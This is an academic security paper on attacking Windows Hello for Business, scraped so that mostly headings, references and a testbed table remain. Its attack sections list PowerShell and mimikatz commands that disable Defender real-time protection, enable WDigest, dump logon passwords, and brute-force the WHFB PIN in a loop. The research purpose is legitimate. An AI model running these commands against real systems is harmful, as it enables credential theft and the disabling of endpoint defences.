Attacking Windows Hello for Business: Is It What We Were Promised?
Abstract
:1. Introduction
- The architecture of a testbed, where the power of virtualization enabled the deployment of Windows Hello for Business (WHFB).
- The orchestration of attacks against the user’s password and PIN within WHFB.
- A robust evaluation of the operation of WHFB and a critical reflection of the results of the mounted attacks against it.
2. Literature Review
2.1. Password-Less Authentication
2.2. How Windows Hello Works
3. Implementation and Attacks
3.1. Setup Information
3.2. The First Attack Method
- #Open PowerShell Session to the end-user device
- New-PSSession -ComputerName <Computer_name>
- Enter-PSSession <Session_ID>
- #Disable Real-time protection,from the previously opened session
- PowerShell Set-MpPreference -DisableRealtimeMonitoring 1
- robocopy C:\Users\administrator\Downloads “\\win11\c$\temp\” mimikatz_trunk.zip
- Expand-Archive -LiteralPath C:\temp\mimikatz_trunk.zip -DestinationPath C:\temp\
- cmd /c.\mimikatz.exe “privilege::debug” “exit”
- reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
- gpupdate /force
- cmd /c.\mimikatz.exe “privilege::debug” “sekurlsa::wdigest” “exit”
- cmd /c.\mimikatz.exe “privilege::debug” “sekurlsa::logonpasswords” “exit”
3.3. The Second Attack Method
- HKEY_USERS\S-1-5-21-1600135255-2060112660-1485531884-1106\Software\Microsoft\Windows NT\CurrentVersion\WorkplaceJoin\AADNGC\.
- cmd /c.\mimikatz.exe “privilege::backup” “ngc::logondata” “exit”
- cmd /c.\mimikatz.exe “privilege::backup” “ngc::pin /withbackup /guid:{80839852-3d34-411c-a39e-00351d9ec527} /pin:824693” “exit”
- $GUID = cmd /c.\mimikatz.exe “privilege::debug” “ngc::logondata” “exit” | Select-String -Pattern ‘GUID’
- $GUID = $GUID -replace ‘\s’,’’
- $count = 0
- 1..999999 |% {
- $count = (1+ $count).ToString(‘000000’)
- $UnkPin = cmd /c.\mimikatz.exe “privilege::backup” “ngc::pin /withbackup /$GUID /pin:$count” “exit”
- if( $UnkPin | Select-String -pattern ‘UnkPin’)
- {
- Write-Output “PIN is: $count”
- Exit
- }
- else {
- Write-Output “PIN not found.”
- }
- }
4. Evaluation and Discussion of Results
5. Conclusions
Author Contributions
Funding
Institutional Review Board Statement
Informed Consent Statement
Data Availability Statement
Conflicts of Interest
Appendix A
Password Authentication
- -
- Single sign-on (SSO) can be used to authenticate to multiple systems within one organization.
- -
- Federated identity management (FIM) offers single access to multiple applications from different enterprises.
- -
- Two-factor authentication (2FA) and multifactor authentication (MFA) are used in combination with other authentication methods.
- -
- Easy passwords can be easily cracked.
- -
- Difficult passwords are more challenging to remember.
- -
- Password reuse risks
- -
- The use of multiple passwords can make it difficult to remember them.
- -
- Poor password policies require changing the password often.
- -
- Phishing attacks
- -
- Defeating password policies
References
- Goldberg, J.; Hagman, J.; Sazawal, V. Doodling our way to better authentication. In CHI ‘02 Extended Abstracts on Human Factors in Computing Systems (CHI EA ‘02); Association for Computing Machinery: New York, NY, USA, 2002; pp. 868–869. [Google Scholar] [CrossRef]
- Farke, F.M.; Lassak, L.; Pinter, J.; Dürmuth, M. Exploring User Authentication with Windows Hello in a Small Business Environment. In Proceedings of the Eighteenth Symposium on Usable Privacy and Security (SOUPS 2022), Boston, MA, USA, 7–9 August 2022; pp. 523–540. [Google Scholar]
- Muthuraj, S.; Sethumadhavan, M.; Amritha, P.P.; Santhya, R. Detection and Prevention of Attacks on Active Directory Using SIEM. Smart Innov. Syst. Technol. 2021, 196, 533–541. [Google Scholar] [CrossRef]
- Liu, Y.; Squires, M.R.; Taylor, C.R.; Walls, R.J.; Shue, C.A. Account Lockouts: Characterizing and Preventing Account Denial-of-Service Attacks. In Security and Privacy in Communication Networks; SecureComm 2019; Lecture Notes of the Institute for Computer Sciences, Social Informatics and Telecommunications Engineering; Chen, S., Choo, K.K., Fu, X., Lou, W., Mohaisen, A., Eds.; Springer: Cham, Switzerland, 2019; Volume 305. [Google Scholar] [CrossRef]
- Kim, E.; Choi, H.K. Security Analysis and Bypass User Authentication Bound to Device of Windows Hello in the Wild. Secur. Commun. Netw. 2021, 2021, 6245306. [Google Scholar] [CrossRef]
- Blaauwendraad, B.; Ouddeken, T.; Van Bockhaven, C. Using Mimikatz’ driver, Mimidrv, to disable Windows Defender in Windows. Comput. Sci. 2020. [Google Scholar]
- Lyastani, S.G.; Schilling, M.; Neumayr, M.; Backes, M.; Bugiel, S. Is FIDO2 the Kingslayer of User Authentication? A Comparative Usability Study of FIDO2 Passwordless Authentication. In Proceedings of the 2020 IEEE Symposium on Security and Privacy (SP), San Francisco, CA, USA, 18–21 May 2020; pp. 268–285. [Google Scholar] [CrossRef]
- Morii, M.; Tanioka, H.; Ohira, K.; Sano, M.; Seki, Y.; Matsuura, K.; Ueta, T. Research on Integrated Authentication Using Passwordless Authentication Method. Proc. Int. Comput. Softw. Appl. Conf. 2017, 1, 682–685. [Google Scholar] [CrossRef]
- Download FIDO Authentication Specifications—FIDO Alliance. 2021. Available online: https://fidoalliance.org/specifications/download/ (accessed on 19 January 2023).
- Alqubaisi, F.; Wazan, A.S.; Ahmad, L.; Chadwick, D.W. Should We Rush to Implement Password-less Single Factor FIDO2 based Authentication? In Proceedings of the 2020 12th Annual Undergraduate Research Conference on Applied Computing, URC 2020, Dubai, United Arab Emirates, 15–16 April 2020. [CrossRef]
- Casey, M.; Manulis, M.; Newton, C.J.P.; Savage, R.; Treharne, H. An Interoperable Architecture for Usable Password-Less Authentication. In Emerging Technologies for Authorization and Authentication; ETAA 2020; Lecture Notes in Computer Science; Saracino, A., Mori, P., Eds.; Springer: Cham, Switzerland, 2020; Volume 12515. [Google Scholar] [CrossRef]
- Mardini, A.; Kim, G. Making Sign-in Safer and More Convenient. 2021. Available online: https://blog.google/technology/safety-security/making-sign-safer-and-more-convenient/ (accessed on 19 January 2023).
- Bassett, G.; Hylender, C.D.; Langlois, P.; Pinto, A.; Widup, S. Data Breach Investigation Report. In Verizon Business. 2021. Available online: https://enterprise.verizon.com/resources/reports/2021-data-breach-investigations-report.pdf (accessed on 10 January 2023).
- Windows Hello for Business Frequently Asked Questions (FAQ)—Windows Security. 2022. Available online: https://docs.microsoft.com/en-us/windows/security/identity-protection/hello-for-business/hello-faq (accessed on 30 January 2023).
- Kavanagh, K.; Bussa, T.; Collins, J. Magic Quadrant for Security Information and Event Management—Gartner Reprint. 2021. Available online: https://www.gartner.com/doc/reprints?id=1-26OLSQ2N&ct=210630&st=sb (accessed on 27 January 2023).
- Morris, R.; Thompson, K. Password security. Commun. ACM 1979, 22, 594–597. [Google Scholar] [CrossRef]
- Bonneau, J.; Herley, C.; Van Oorschot, P.C.; Stajano, F. Passwords and the evolution of imperfect authentication. Commun. ACM 2015, 58, 78–87. [Google Scholar] [CrossRef] [Green Version]
- Florêncio, D.; Florêncio, F.; Herley, C. A Large-Scale Study of Web Password Habits. In Proceedings of the 16th International Conference on World Wide Web—WWW ‘07, Banff, AB, Canada, 8–12 May 2007. [Google Scholar] [CrossRef]
- Password Policy Recommendations—Microsoft 365 Admin. 2022. Available online: https://docs.microsoft.com/en-us/microsoft-365/admin/misc/password-policy-recommendations?view=o365-worldwide (accessed on 13 January 2023).
- Li, J.; Stecker, L.; Zeigler, E.; Holland, T.; Liang, D. Scramble the Password Before You Type It. Adv. Intell. Syst. Comput. 2018, 746, 1097–1107. [Google Scholar] [CrossRef]
- Lyastani, S.G.; Schilling, M.; Fahl, S.; Bugiel, S.; Backes, M. Studying the Impact of Managers on Password Strength and Reuse. arXiv 2017, arXiv:1712.08940. [Google Scholar]
- Indu, I.; Anand PM, R.; Bhaskar, V. Identity and access management in cloud environment: Mechanisms and challenges. Eng. Sci. Technol. Int. J. 2018, 21, 574–588. [Google Scholar] [CrossRef]
- Pitropakis, N.; Yfantopoulos, N.; Geneiatakis, D.; Lambrinoudakis, C. Towards an augmented authenticator in the Cloud. In Proceedings of the 2014 IEEE International Symposium on Signal Processing and Information Technology (ISSPIT), Noida, India, 15–17 December 2014; pp. 296–300. [Google Scholar]
- Kävrestad, J.; Lennartsson, M.; Birath, M.; Nohlberg, M. Constructing secure and memorable passwords. Inf. Comput. Secur. 2020, 28, 701–717. [Google Scholar] [CrossRef]
- Das, S.; Dingman, A.; Camp, L.J. Why Johnny Doesn’t Use Two Factor a Two-Phase Usability Study of the FIDO U2F Security Key. In Financial Cryptography and Data Security; FC 2018, Lecture Notes in Computer Science; Meiklejohn, S., Sako, K., Eds.; Springer: Berlin/Heidelberg, Germany, 2018; Volume 10957. [Google Scholar] [CrossRef]
- ChromePass—Chrome Browser Password Recovery for Windows. 2022. Available online: https://www.nirsoft.net/utils/chromepass.html (accessed on 26 January 2023).
- Are Your Passwords in the Green? 2022. Available online: https://www.hivesystems.io/blog/are-your-passwords-in-the-green (accessed on 13 January 2023).
VM Name | DC1-CA | FEDSVR | WIN11 |
---|---|---|---|
Virtual Processors | 4 | 4 | 4 |
Memory | 8GB | 8GB | 2GB |
Hard drive | SSD2 | SSD3 | SSD1 |
VM Hard drive size | 60 GB | 60 GB | 60 GB |
Virtual TPM enabled | No | No | Yes |
Operating System (OS) | Windows Server | Windows Server | Windows |
OS version | 2019 Standard | 2019 Standard | 11 |
Disclaimer/Publisher’s Note: The statements, opinions and data contained in all publications are solely those of the individual author(s) and contributor(s) and not of MDPI and/or the editor(s). MDPI and/or the editor(s) disclaim responsibility for any injury to people or property resulting from any ideas, methods, instructions or products referred to in the content. |
© 2023 by the authors. Licensee MDPI, Basel, Switzerland. This article is an open access article distributed under the terms and conditions of the Creative Commons Attribution (CC BY) license (https://creativecommons.org/licenses/by/4.0/).
Share and Cite
Haddad, J.; Pitropakis, N.; Chrysoulas, C.; Lemoudden, M.; Buchanan, W.J. Attacking Windows Hello for Business: Is It What We Were Promised? Cryptography 2023, 7, 9. https://doi.org/10.3390/cryptography7010009
Haddad J, Pitropakis N, Chrysoulas C, Lemoudden M, Buchanan WJ. Attacking Windows Hello for Business: Is It What We Were Promised? Cryptography. 2023; 7(1):9. https://doi.org/10.3390/cryptography7010009
Chicago/Turabian StyleHaddad, Joseph, Nikolaos Pitropakis, Christos Chrysoulas, Mouad Lemoudden, and William J. Buchanan. 2023. "Attacking Windows Hello for Business: Is It What We Were Promised?" Cryptography 7, no. 1: 9. https://doi.org/10.3390/cryptography7010009